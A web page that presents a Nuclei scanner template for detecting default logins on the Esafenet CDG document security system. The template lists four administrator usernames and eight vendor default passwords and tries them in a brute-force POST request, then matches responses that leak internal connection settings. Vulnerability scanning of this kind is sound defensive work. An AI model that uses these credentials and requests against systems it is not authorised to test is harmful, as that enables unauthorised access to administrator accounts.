Skip to content

Esafenet CDG - Default Login

ID: esafenet-cdg-default-login

Severity: high

Author: chesterblue

Tags: esafenet,cdg,default-login

Esafenet electronic document security management system default credentials were discovered.

id: esafenet-cdg-default-login
info:
name: Esafenet CDG - Default Login
author: chesterblue
severity: high
description: |
Esafenet electronic document security management system default credentials were discovered.
classification:
cpe: cpe:2.3:a:esafenet:cdg:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 32
vendor: esafenet
product: cdg
fofa-query: esafenet
tags: esafenet,cdg,default-login
http:
- method: POST
path:
- "{{BaseURL}}/CDGServer3/SystemConfig"
headers:
content-type: application/x-www-form-urlencoded
body: "command=Login&help=null&verifyCodeDigit=dfd&name={{username}}&pass={{password}}"
attack: clusterbomb
payloads:
username:
- "systemadmin"
- "configadmin"
- "secadmin"
- "docadmin"
password:
- "Est@Spc820"
- "12345678"
- "123456"
- "Est@Spc2018"
- "Est@Spc2019"
- "Est@Spc2020"
- "Est@Spc2021"
- "Est@Spc2022"
matchers-condition: and
matchers:
- type: word
words:
- "est.connection.url"
- type: regex
part: body
regex:
- "(127\\.0\\.0\\.1)|(localhost)(192\\.168|10\\.|172\\.(1[6-9]|2\\d|3[01]))\\.\\d{1,3}\\.\\d{1,3}"
- type: status
status:
- 200
# digest: 4a0a0047304502210085e9f3b18bc5b7b44e028a20c0745ee61d7a63c9563e593e6a898ee100ffe9ba02201fa634ce63e9425db0f5fd96d880a129aa85a75a011f5a64e5e16f08bd1c1fa0:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/default-logins/esafenet-cdg-default-login.yaml"

View on Github